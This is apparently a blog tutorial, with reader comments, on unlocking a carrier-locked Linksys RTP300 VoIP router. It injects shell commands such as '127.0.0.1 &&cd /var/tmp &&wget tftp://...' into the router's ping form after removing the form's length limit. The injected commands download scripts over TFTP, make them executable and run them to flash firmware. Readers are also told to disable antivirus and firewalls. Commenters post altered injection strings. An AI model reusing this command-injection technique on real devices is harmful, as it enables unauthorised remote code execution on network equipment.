[Unlock] Linksys RTP300 from Vonage
Posted on : 28-04-2010 | By : admin | In : Featured, Home, Network, Programing, linux
4
Hello Guys Here’s how to hack your Jailed RTP300
- tFTP -> http://tftpd32.jounin.net/download/Tftpd32-3.35-setup.exe
- The Zip -> Hack RTP300.zip
- Firefox -> www.mozilla.com/en-US/firefox/ With -> https://addons.mozilla.org/en-US/firefox/addon/60
- A beer
Keep this page aways up so you have something to look at case you forget something
Step 2: Configure TFTP32
- Run TFTP32. Click settings, and then setup the base directory. Use the directory you installed the program (ex. C:\Program Files\TFTP32) and make sure the extracted files from the ZIP are in this directory. Change security to none, and set the timeout and max retransmit to 10 and then hit OK.
Step 3: Unlock the Console using Ping Hack
- Make sure you have downloaded everything from step 1 and ensure the getready file from the ZIP is in the TFTP32 folder. Now disconnect from the internet and connect directly to the RTP300 making sure the device is also not connected to the internet (ie. pull the Ethernet cord out of the WAN port). Also make sure to disable any Anti-Virus and firewall programs that may be running.
- Use a paperclip and hard reset the RTP300 (hold reset for 10-15 seconds). Go to »192.168.15.1 with the username/pass of admin/admin. Once the router restarts go to Administration >> Ping. Also make sure TFTP32 is running.
- On the Ping popup, right click >> Web Developer >> Forms >> Remove Maximum Lengths.
Enter the following and click Ping.
- 127.0.0.1 &&cd /var/tmp &&wget tftp://192.168.15.100/getready
Right Click >> Web Developer >> Forms >> Remove Maximum Lengths. Enter the following and click Ping.
- 127.0.0.1 &&cd /var/tmp &&chmod 755 getready
Right Click >> Web Developer >> Forms >> Remove Maximum Lengths. Enter the following and click Ping.
- 127.0.0.1 &&sh /var/tmp/getready
After a few seconds you should see some information in the output box. Scroll down to the last line and look for CONSOLE_STATE unlocked. If you see this you are good to go. Now Restart the RTP300
Step 5. The Hack
- Log back into the router and go to Administration >> Ping. Also make sure TFTP32 is running.
- On the Ping popup, right click >> Web Developer >> Forms >> Remove Maximum Lengths.
Enter the following and click Ping.
- 127.0.0.1 &&cd /var/tmp &&wget tftp://192.168.15.100/install
Right Click >> Web Developer >> Forms >> Remove Maximum Lengths. Enter the following and click Ping.
- 127.0.0.1 &&cd /var/tmp &&chmod 755 install
Right Click >> Web Developer >> Forms >> Remove Maximum Lengths. Enter the following and click Ping.
- 127.0.0.1 &&sh /var/tmp/install
You should now see a file transfer in progress under TFTP32. After the firmware has been transferred the power light on the RTP300 will start to blink if everything is successful. DO NOT INTERRUPT THIS PROCESS. IT MAY TAKE UP TO 2-4 MINUTES TO COMPLETE. WAIT FOR THE POWER LIGHT TO RETURN SOLID AND FOR AN ETHERNET LINK TO BE ESTABLISHED.
Hey thanks a bunch for your tutorial! I had to make a few changes to the ping codes to get my RTP300 (5.01.04) to work. Here is what I used.
192.168.15.1 & cd /var/tmp; wget tftp://192.168.15.100/getready
192.168.15.1 & chmod 755 /var/tmp/getready
192.168.15.1 & sh /var/tmp/getready
—-
192.168.15.1 & cd /var/tmp; wget tftp://192.168.15.100/install
192.168.15.1 & chmod 755 /var/tmp/install
192.168.15.1 & sh /var/tmp/install
Thanks again!
Great tutorial, worked like a charm, except you don’t need the chmod if you sh the script
Hi,
When the last command is executed and the file is transfered, RTP300 won’t install it, why? I had to change the install script because the file is named newos.bin, and not newos.bindd as written in the script…. Any ideas?
The firmware is 3.1.24 on the RTP300 and the VOIP subscriber has locked the Voice and Upgade options with their own password….
dd is a command